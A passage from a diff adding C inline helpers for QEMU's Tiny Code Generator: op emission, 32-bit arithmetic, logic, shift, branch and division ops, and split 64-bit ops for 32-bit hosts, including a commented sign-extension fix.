TCGOpcode opc, TCGv_i64 arg1, TCGv_i64 arg2, + TCGArg arg3, TCGArg arg4) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = arg3; + *s->gen_opparam_ptr++ = arg4; +} + +static inline void tcg_gen_op5_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGv_i32 arg2, + TCGv_i32 arg3, TCGv_i32 arg4, TCGv_i32 arg5) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + 
*s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg4); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg5); +} + +static inline void tcg_gen_op5_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGv_i64 arg2, + TCGv_i64 arg3, TCGv_i64 arg4, TCGv_i64 arg5) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg4); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg5); +} + +static inline void tcg_gen_op5i_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGv_i32 arg2, + TCGv_i32 arg3, TCGv_i32 arg4, TCGArg arg5) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg4); + *s->gen_opparam_ptr++ = arg5; +} + +static inline void tcg_gen_op5i_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGv_i64 arg2, + TCGv_i64 arg3, TCGv_i64 arg4, TCGArg arg5) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg4); + *s->gen_opparam_ptr++ = arg5; +} + +static inline void tcg_gen_op5ii_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, + TCGv_i32 arg2, TCGv_i32 arg3, + TCGArg arg4, TCGArg arg5) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg3); + *s->gen_opparam_ptr++ = arg4; + *s->gen_opparam_ptr++ = arg5; +} + +static inline void tcg_gen_op5ii_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, + TCGv_i64 arg2, TCGv_i64 arg3, + TCGArg arg4, TCGArg arg5) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + 
*s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg3); + *s->gen_opparam_ptr++ = arg4; + *s->gen_opparam_ptr++ = arg5; +} + +static inline void tcg_gen_op6_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGv_i32 arg2, + TCGv_i32 arg3, TCGv_i32 arg4, TCGv_i32 arg5, + TCGv_i32 arg6) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg4); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg5); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg6); +} + +static inline void tcg_gen_op6_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGv_i64 arg2, + TCGv_i64 arg3, TCGv_i64 arg4, TCGv_i64 arg5, + TCGv_i64 arg6) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg4); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg5); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg6); +} + +static inline void tcg_gen_op6i_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGv_i32 arg2, + TCGv_i32 arg3, TCGv_i32 arg4, + TCGv_i32 arg5, TCGArg arg6) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg4); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg5); + *s->gen_opparam_ptr++ = arg6; +} + +static inline void tcg_gen_op6i_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGv_i64 arg2, + TCGv_i64 arg3, TCGv_i64 arg4, + TCGv_i64 arg5, TCGArg arg6) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg4); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg5); + *s->gen_opparam_ptr++ 
= arg6; +} + +static inline void tcg_gen_op6ii_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, + TCGv_i32 arg2, TCGv_i32 arg3, + TCGv_i32 arg4, TCGArg arg5, TCGArg arg6) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg4); + *s->gen_opparam_ptr++ = arg5; + *s->gen_opparam_ptr++ = arg6; +} + +static inline void tcg_gen_op6ii_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, + TCGv_i64 arg2, TCGv_i64 arg3, + TCGv_i64 arg4, TCGArg arg5, TCGArg arg6) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg4); + *s->gen_opparam_ptr++ = arg5; + *s->gen_opparam_ptr++ = arg6; +} + +static inline void tcg_add_param_i32(TCGContext *s, TCGv_i32 val) +{ + *s->gen_opparam_ptr++ = GET_TCGV_I32(val); +} + +static inline void tcg_add_param_i64(TCGContext *s, TCGv_i64 val) +{ +#if TCG_TARGET_REG_BITS == 32 + *s->gen_opparam_ptr++ = GET_TCGV_I32(TCGV_LOW(val)); + *s->gen_opparam_ptr++ = GET_TCGV_I32(TCGV_HIGH(val)); +#else + *s->gen_opparam_ptr++ = GET_TCGV_I64(val); +#endif +} + +static inline void gen_set_label(TCGContext *s, int n) +{ + tcg_gen_op1i(s, INDEX_op_set_label, n); +} + +static inline void tcg_gen_br(TCGContext *s, int label) +{ + tcg_gen_op1i(s, INDEX_op_br, label); +} + +static inline void tcg_gen_mov_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg) +{ + if (!TCGV_EQUAL_I32(ret, arg)) + tcg_gen_op2_i32(s, INDEX_op_mov_i32, ret, arg); +} + +static inline void tcg_gen_movi_i32(TCGContext *s, TCGv_i32 ret, int32_t arg) +{ + tcg_gen_op2i_i32(s, INDEX_op_movi_i32, ret, arg); +} + +/* 32 bit ops */ + +static inline void tcg_gen_ld8u_i32(TCGContext *s, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i32(s, INDEX_op_ld8u_i32, ret, arg2, 
offset); +} + +static inline void tcg_gen_ld8s_i32(TCGContext *s, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i32(s, INDEX_op_ld8s_i32, ret, arg2, offset); +} + +static inline void tcg_gen_ld16u_i32(TCGContext *s, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i32(s, INDEX_op_ld16u_i32, ret, arg2, offset); +} + +static inline void tcg_gen_ld16s_i32(TCGContext *s, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i32(s, INDEX_op_ld16s_i32, ret, arg2, offset); +} + +static inline void tcg_gen_ld_i32(TCGContext *s, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i32(s, INDEX_op_ld_i32, ret, arg2, offset); +} + +static inline void tcg_gen_st8_i32(TCGContext *s, TCGv_i32 arg1, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i32(s, INDEX_op_st8_i32, arg1, arg2, offset); +} + +static inline void tcg_gen_st16_i32(TCGContext *s, TCGv_i32 arg1, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i32(s, INDEX_op_st16_i32, arg1, arg2, offset); +} + +static inline void tcg_gen_st_i32(TCGContext *s, TCGv_i32 arg1, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i32(s, INDEX_op_st_i32, arg1, arg2, offset); +} + +static inline void tcg_gen_add_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + tcg_gen_op3_i32(s, INDEX_op_add_i32, ret, arg1, arg2); +} + +static inline void tcg_gen_addi_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + /* some cases can be optimized here */ + if (arg2 == 0) { + tcg_gen_mov_i32(s, ret, arg1); + } else { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_add_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_sub_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + tcg_gen_op3_i32(s, INDEX_op_sub_i32, ret, arg1, arg2); +} + +static inline void tcg_gen_subfi_i32(TCGContext *s, TCGv_i32 ret, int32_t arg1, TCGv_i32 arg2) +{ + TCGv_i32 
t0 = tcg_const_i32(s, arg1); + tcg_gen_sub_i32(s, ret, t0, arg2); + tcg_temp_free_i32(s, t0); +} + +static inline void tcg_gen_subi_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + /* some cases can be optimized here */ + if (arg2 == 0) { + tcg_gen_mov_i32(s, ret, arg1); + } else { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_sub_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_and_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCGV_EQUAL_I32(arg1, arg2)) { + tcg_gen_mov_i32(s, ret, arg1); + } else { + tcg_gen_op3_i32(s, INDEX_op_and_i32, ret, arg1, arg2); + } +} + +static inline void tcg_gen_andi_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, uint32_t arg2) +{ + TCGv_i32 t0; + /* Some cases can be optimized here. */ + switch (arg2) { + case 0: + tcg_gen_movi_i32(s, ret, 0); + return; + case 0xffffffffu: + tcg_gen_mov_i32(s, ret, arg1); + return; + case 0xffu: + /* Don't recurse with tcg_gen_ext8u_i32. */ + if (TCG_TARGET_HAS_ext8u_i32) { + tcg_gen_op2_i32(s, INDEX_op_ext8u_i32, ret, arg1); + return; + } + break; + case 0xffffu: + if (TCG_TARGET_HAS_ext16u_i32) { + tcg_gen_op2_i32(s, INDEX_op_ext16u_i32, ret, arg1); + return; + } + break; + } + t0 = tcg_const_i32(s, arg2); + tcg_gen_and_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); +} + +static inline void tcg_gen_or_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCGV_EQUAL_I32(arg1, arg2)) { + tcg_gen_mov_i32(s, ret, arg1); + } else { + tcg_gen_op3_i32(s, INDEX_op_or_i32, ret, arg1, arg2); + } +} + +static inline void tcg_gen_ori_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + /* Some cases can be optimized here. 
*/ + if (arg2 == -1) { + tcg_gen_movi_i32(s, ret, -1); + } else if (arg2 == 0) { + tcg_gen_mov_i32(s, ret, arg1); + } else { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_or_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_xor_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCGV_EQUAL_I32(arg1, arg2)) { + tcg_gen_movi_i32(s, ret, 0); + } else { + tcg_gen_op3_i32(s, INDEX_op_xor_i32, ret, arg1, arg2); + } +} + +static inline void tcg_gen_xori_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + /* Some cases can be optimized here. */ + if (arg2 == 0) { + tcg_gen_mov_i32(s, ret, arg1); + } else if (arg2 == -1 && TCG_TARGET_HAS_not_i32) { + /* Don't recurse with tcg_gen_not_i32. */ + tcg_gen_op2_i32(s, INDEX_op_not_i32, ret, arg1); + } else { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_xor_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_shl_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + tcg_gen_op3_i32(s, INDEX_op_shl_i32, ret, arg1, arg2); +} + +static inline void tcg_gen_shli_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + if (arg2 == 0) { + tcg_gen_mov_i32(s, ret, arg1); + } else { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_shl_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_shr_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + tcg_gen_op3_i32(s, INDEX_op_shr_i32, ret, arg1, arg2); +} + +static inline void tcg_gen_shri_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + if (arg2 == 0) { + tcg_gen_mov_i32(s, ret, arg1); + } else { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_shr_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_sar_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + tcg_gen_op3_i32(s, INDEX_op_sar_i32, ret, arg1, arg2); +} + +static inline void 
tcg_gen_sari_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + if (arg2 == 0) { + tcg_gen_mov_i32(s, ret, arg1); + } else { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_sar_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_brcond_i32(TCGContext *s, TCGCond cond, TCGv_i32 arg1, + TCGv_i32 arg2, int label_index) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_br(s, label_index); + } else if (cond != TCG_COND_NEVER) { + tcg_gen_op4ii_i32(s, INDEX_op_brcond_i32, arg1, arg2, cond, label_index); + } +} + +static inline void tcg_gen_brcondi_i32(TCGContext *s, TCGCond cond, TCGv_i32 arg1, + int32_t arg2, int label_index) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_br(s, label_index); + } else if (cond != TCG_COND_NEVER) { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_brcond_i32(s, cond, arg1, t0, label_index); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_setcond_i32(TCGContext *s, TCGCond cond, TCGv_i32 ret, + TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_movi_i32(s, ret, 1); + } else if (cond == TCG_COND_NEVER) { + tcg_gen_movi_i32(s, ret, 0); + } else { + tcg_gen_op4i_i32(s, INDEX_op_setcond_i32, ret, arg1, arg2, cond); + } +} + +static inline void tcg_gen_setcondi_i32(TCGContext *s, TCGCond cond, TCGv_i32 ret, + TCGv_i32 arg1, int32_t arg2) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_movi_i32(s, ret, 1); + } else if (cond == TCG_COND_NEVER) { + tcg_gen_movi_i32(s, ret, 0); + } else { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_setcond_i32(s, cond, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_mul_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + tcg_gen_op3_i32(s, INDEX_op_mul_i32, ret, arg1, arg2); +} + +static inline void tcg_gen_muli_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_mul_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, 
t0); +} + +static inline void tcg_gen_div_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_div_i32) { + tcg_gen_op3_i32(s, INDEX_op_div_i32, ret, arg1, arg2); + } else if (TCG_TARGET_HAS_div2_i32) { + TCGv_i32 t0 = tcg_temp_new_i32(s); + tcg_gen_sari_i32(s, t0, arg1, 31); + tcg_gen_op5_i32(s, INDEX_op_div2_i32, ret, t0, arg1, t0, arg2); + tcg_temp_free_i32(s, t0); + } else { + gen_helper_div_i32(s, ret, arg1, arg2); + } +} + +static inline void tcg_gen_rem_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_rem_i32) { + tcg_gen_op3_i32(s, INDEX_op_rem_i32, ret, arg1, arg2); + } else if (TCG_TARGET_HAS_div_i32) { + TCGv_i32 t0 = tcg_temp_new_i32(s); + tcg_gen_op3_i32(s, INDEX_op_div_i32, t0, arg1, arg2); + tcg_gen_mul_i32(s, t0, t0, arg2); + tcg_gen_sub_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } else if (TCG_TARGET_HAS_div2_i32) { + TCGv_i32 t0 = tcg_temp_new_i32(s); + tcg_gen_sari_i32(s, t0, arg1, 31); + tcg_gen_op5_i32(s, INDEX_op_div2_i32, t0, ret, arg1, t0, arg2); + tcg_temp_free_i32(s, t0); + } else { + gen_helper_rem_i32(s, ret, arg1, arg2); + } +} + +static inline void tcg_gen_divu_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_div_i32) { + tcg_gen_op3_i32(s, INDEX_op_divu_i32, ret, arg1, arg2); + } else if (TCG_TARGET_HAS_div2_i32) { + TCGv_i32 t0 = tcg_temp_new_i32(s); + tcg_gen_movi_i32(s, t0, 0); + tcg_gen_op5_i32(s, INDEX_op_divu2_i32, ret, t0, arg1, t0, arg2); + tcg_temp_free_i32(s, t0); + } else { + gen_helper_divu_i32(s, ret, arg1, arg2); + } +} + +static inline void tcg_gen_remu_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_rem_i32) { + tcg_gen_op3_i32(s, INDEX_op_remu_i32, ret, arg1, arg2); + } else if (TCG_TARGET_HAS_div_i32) { + TCGv_i32 t0 = tcg_temp_new_i32(s); + tcg_gen_op3_i32(s, INDEX_op_divu_i32, t0, arg1, arg2); + tcg_gen_mul_i32(s, t0, t0, arg2); + tcg_gen_sub_i32(s, ret, 
arg1, t0); + tcg_temp_free_i32(s, t0); + } else if (TCG_TARGET_HAS_div2_i32) { + TCGv_i32 t0 = tcg_temp_new_i32(s); + tcg_gen_movi_i32(s, t0, 0); + tcg_gen_op5_i32(s, INDEX_op_divu2_i32, t0, ret, arg1, t0, arg2); + tcg_temp_free_i32(s, t0); + } else { + gen_helper_remu_i32(s, ret, arg1, arg2); + } +} + +#if TCG_TARGET_REG_BITS == 32 + +static inline void tcg_gen_mov_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (!TCGV_EQUAL_I64(ret, arg)) { + tcg_gen_mov_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); + tcg_gen_mov_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg)); + } +} + +static inline void tcg_gen_movi_i64(TCGContext *s, TCGv_i64 ret, int64_t arg) +{ + tcg_gen_movi_i32(s, TCGV_LOW(ret), (int32_t)arg); + tcg_gen_movi_i32(s, TCGV_HIGH(ret), arg >> 32); +} + +static inline void tcg_gen_ld8u_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ld8u_i32(s, TCGV_LOW(ret), arg2, offset); + tcg_gen_movi_i32(s, TCGV_HIGH(ret), 0); +} + +static inline void tcg_gen_ld8s_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ld8s_i32(s, TCGV_LOW(ret), arg2, offset); + /* Sign-extend from the just-loaded low half; previously this read the + stale (uninitialized) high half via TCGV_HIGH(ret). Matches the + ld16s/ld32s variants below and upstream QEMU's fix. */ + tcg_gen_sari_i32(s, TCGV_HIGH(ret), TCGV_LOW(ret), 31); +} + +static inline void tcg_gen_ld16u_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ld16u_i32(s, TCGV_LOW(ret), arg2, offset); + tcg_gen_movi_i32(s, TCGV_HIGH(ret), 0); +} + +static inline void tcg_gen_ld16s_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ld16s_i32(s, TCGV_LOW(ret), arg2, offset); + tcg_gen_sari_i32(s, TCGV_HIGH(ret), TCGV_LOW(ret), 31); +} + +static inline void tcg_gen_ld32u_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ld_i32(s, TCGV_LOW(ret), arg2, offset); + tcg_gen_movi_i32(s, TCGV_HIGH(ret), 0); +} + +static inline void tcg_gen_ld32s_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ld_i32(s, TCGV_LOW(ret), arg2, offset); 
+ tcg_gen_sari_i32(s, TCGV_HIGH(ret), TCGV_LOW(ret), 31); +} + +static inline void tcg_gen_ld_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + /* since arg2 and ret have different types, they cannot be the + same temporary */ +#ifdef HOST_WORDS_BIGENDIAN + tcg_gen_ld_i32(s, TCGV_HIGH(ret), arg2, offset); + tcg_gen_ld_i32(s, TCGV_LOW(ret), arg2, offset + 4); +#else + tcg_gen_ld_i32(s, TCGV_LOW(ret), arg2, offset); + tcg_gen_ld_i32(s, TCGV_HIGH(ret), arg2, offset + 4); +#endif +} + +static inline void tcg_gen_st8_i64(TCGContext *s, TCGv_i64 arg1, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_st8_i32(s, TCGV_LOW(arg1), arg2, offset); +} + +static inline void tcg_gen_st16_i64(TCGContext *s, TCGv_i64 arg1, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_st16_i32(s, TCGV_LOW(arg1), arg2, offset); +} + +static inline void tcg_gen_st32_i64(TCGContext *s, TCGv_i64 arg1, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_st_i32(s, TCGV_LOW(arg1), arg2, offset); +} + +static inline void tcg_gen_st_i64(TCGContext *s, TCGv_i64 arg1, TCGv_ptr arg2, + tcg_target_long offset) +{ +#ifdef HOST_WORDS_BIGENDIAN + tcg_gen_st_i32(s, TCGV_HIGH(arg1), arg2, offset); + tcg_gen_st_i32(s, TCGV_LOW(arg1), arg2, offset + 4); +#else + tcg_gen_st_i32(s, TCGV_LOW(arg1), arg2, offset); + tcg_gen_st_i32(s, TCGV_HIGH(arg1), arg2, offset + 4); +#endif +} + +static inline void tcg_gen_add_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_op6_i32(s, INDEX_op_add2_i32, TCGV_LOW(ret), TCGV_HIGH(ret), + TCGV_LOW(arg1), TCGV_HIGH(arg1), TCGV_LOW(arg2), + TCGV_HIGH(arg2)); + /* Allow the optimizer room to replace add2 with two moves. 
*/ + tcg_gen_op0(s, INDEX_op_nop); +} + +static inline void tcg_gen_sub_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_op6_i32(s, INDEX_op_sub2_i32, TCGV_LOW(ret), TCGV_HIGH(ret), + TCGV_LOW(arg1), TCGV_HIGH(arg1), TCGV_LOW(arg2), + TCGV_HIGH(arg2)); + /* Allow the optimizer room to replace sub2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); +} + +static inline void tcg_gen_and_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_and_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), TCGV_LOW(arg2)); + tcg_gen_and_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), TCGV_HIGH(arg2)); +} + +static inline void tcg_gen_andi_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + tcg_gen_andi_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), (uint32_t)arg2); + tcg_gen_andi_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), arg2 >> 32); +} + +static inline void tcg_gen_or_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_or_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), TCGV_LOW(arg2)); + tcg_gen_or_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), TCGV_HIGH(arg2)); +} + +static inline void tcg_gen_ori_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + tcg_gen_ori_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), (uint32_t)arg2); + tcg_gen_ori_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), arg2 >> 32); +} + +static inline void tcg_gen_xor_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_xor_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), TCGV_LOW(arg2)); + tcg_gen_xor_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), TCGV_HIGH(arg2)); +} + +static inline void tcg_gen_xori_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + tcg_gen_xori_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), (int32_t)arg2); + tcg_gen_xori_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), arg2 >> 32); +} + +/* XXX: use generic code when basic block handling is OK or CPU + specific code (x86) */ +static inline void tcg_gen_shl_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, 
TCGv_i64 arg2) +{ + gen_helper_shl_i64(s, ret, arg1, arg2); +} + +static inline void tcg_gen_shli_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + tcg_gen_shifti_i64(s, ret, arg1, (int)arg2, 0, 0); +} + +static inline void tcg_gen_shr_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + gen_helper_shr_i64(s, ret, arg1, arg2); +} + +static inline void tcg_gen_shri_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + tcg_gen_shifti_i64(s, ret, arg1, (int)arg2, 1, 0); +} + +static inline void tcg_gen_sar_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + gen_helper_sar_i64(s, ret, arg1, arg2); +} + +static inline void tcg_gen_sari_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + tcg_gen_shifti_i64(s, ret, arg1, (int)arg2, 1, 1); +} + +static inline void tcg_gen_brcond_i64(TCGContext *s, TCGCond cond, TCGv_i64 arg1, + TCGv_i64 arg2, int label_index) +{ + if 